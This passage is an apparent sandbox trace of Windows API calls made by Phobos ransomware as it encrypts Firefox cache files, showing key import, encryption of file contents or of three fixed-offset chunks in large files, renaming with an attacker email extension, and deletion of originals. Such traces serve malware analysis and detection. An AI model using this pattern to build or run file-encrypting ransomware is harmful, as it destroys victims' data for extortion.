lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0193.953] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0193.953] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0193.953] ReadFile (in: hFile=0x154, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf888, lpOverlapped=0x0) returned 1 [0193.965] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf890, dwBufLen=0xf890 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf890) returned 1 [0193.965] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf890, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf890, lpOverlapped=0x0) returned 1 [0193.967] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0193.967] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0193.967] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0193.967] CryptDestroyKey (hKey=0xa32a28) returned 1 [0193.967] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0193.967] CryptDestroyKey (hKey=0xa327e8) returned 1 [0193.967] CloseHandle (hObject=0x154) returned 1 [0193.967] CloseHandle (hObject=0x134) returned 1 [0193.967] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01")) returned 1 [0193.968] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0193.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0193.969] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=43023) returned 1 [0193.969] CloseHandle (hObject=0x134) returned 1 [0193.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01")) returned 0x2020 [0193.969] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0193.970] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0193.970] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0193.970] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0193.970] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa327e8) returned 1 [0193.971] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0193.971] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xa80f, lpOverlapped=0x0) returned 1 [0194.049] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa810, dwBufLen=0xa810 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xa810) returned 1 [0194.050] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xa810, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xa810, lpOverlapped=0x0) returned 1 [0194.051] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0194.051] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0194.051] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0194.051] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.051] WriteFile (in: hFile=0x154, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0194.051] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.051] CloseHandle (hObject=0x134) returned 1 [0194.051] CloseHandle (hObject=0x154) returned 1 [0194.052] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01")) returned 1 [0194.053] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0194.053] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.067] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=4194304) returned 1 [0194.067] CloseHandle (hObject=0x178) returned 1 [0194.067] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_")) returned 0x2020 [0194.067] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0194.067] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_002_.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_002_.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.067] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0194.068] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0194.068] ReadFile (in: hFile=0x178, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0194.080] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x155555, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0194.080] ReadFile (in: hFile=0x178, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0194.083] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x3c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0194.083] ReadFile (in: hFile=0x178, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0194.087] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa32ae8) returned 1 [0194.087] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0194.087] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0194.102] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.102] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0194.103] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0194.502] SetEndOfFile (hFile=0x178) returned 1 [0194.503] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x3c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0194.503] WriteFile (in: hFile=0x178, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0194.504] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x155555, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0194.504] WriteFile (in: hFile=0x178, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0194.506] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0194.506] WriteFile (in: hFile=0x178, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0194.507] CloseHandle (hObject=0x178) returned 1 [0194.508] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0194.508] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0194.536] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=4194304) returned 1 [0194.536] CloseHandle (hObject=0x12c) returned 1 [0194.536] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_")) returned 0x2020 [0194.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0194.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_003_.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_003_.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0194.537] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0194.537] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0194.537] ReadFile (in: hFile=0x12c, lpBuffer=0x3070058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x3070058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0194.548] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x155555, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0194.548] ReadFile (in: hFile=0x12c, lpBuffer=0x30b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30b0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0194.551] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x3c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c0 | out: lpNewFilePointer=0x0) returned 1 [0194.551] ReadFile (in: hFile=0x12c, lpBuffer=0x30f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2e0f8cc, lpOverlapped=0x0 | out: lpBuffer=0x30f0058*, lpNumberOfBytesRead=0x2e0f8cc*=0x40000, lpOverlapped=0x0) returned 1 [0194.556] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8b0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f91c | out: phKey=0x2e0f91c*=0xa327e8) returned 1 [0194.556] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0194.556] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8d0*=0xc0050) returned 1 [0194.561] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.561] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f8 | out: lpNewFilePointer=0x0) returned 1 [0194.562] WriteFile (in: hFile=0x12c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x2e0f908, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f908*=0xc0102, lpOverlapped=0x0) returned 1 [0195.167] SetEndOfFile (hFile=0x12c) returned 1 [0195.167] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x3c0000, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0195.167] WriteFile (in: hFile=0x12c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0195.168] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x155555, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0195.168] WriteFile (in: hFile=0x12c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0195.170] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8c8 | out: lpNewFilePointer=0x0) returned 1 [0195.170] WriteFile (in: hFile=0x12c, lpBuffer=0x313013a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2e0f8d4, lpOverlapped=0x0 | out: lpBuffer=0x313013a*, lpNumberOfBytesWritten=0x2e0f8d4*=0x40000, lpOverlapped=0x0) returned 1 [0195.171] CloseHandle (hObject=0x12c) returned 1 [0195.172] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0195.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.172] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1) returned 1 [0195.172] CloseHandle (hObject=0x12c) returned 1 [0195.173] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_")) returned 0x2020 [0195.173] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0195.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x12c [0195.173] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.173] SetFilePointerEx (in: hFile=0x12c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0195.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0195.174] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32be8) returned 1 [0195.174] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.174] ReadFile (in: hFile=0x12c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1, lpOverlapped=0x0) returned 1 [0195.174] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10, dwBufLen=0x10 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x10) returned 1 [0195.175] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x10, lpOverlapped=0x0) returned 1 [0195.175] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0195.175] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0195.175] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0195.175] CryptDestroyKey (hKey=0xa32a28) returned 1 [0195.175] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0195.175] CryptDestroyKey (hKey=0xa32be8) returned 1 [0195.176] CloseHandle (hObject=0x12c) returned 1 [0195.176] CloseHandle (hObject=0xac) returned 1 [0195.176] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\_cache_clean_")) returned 1 [0195.177] CryptGenRandom (in: 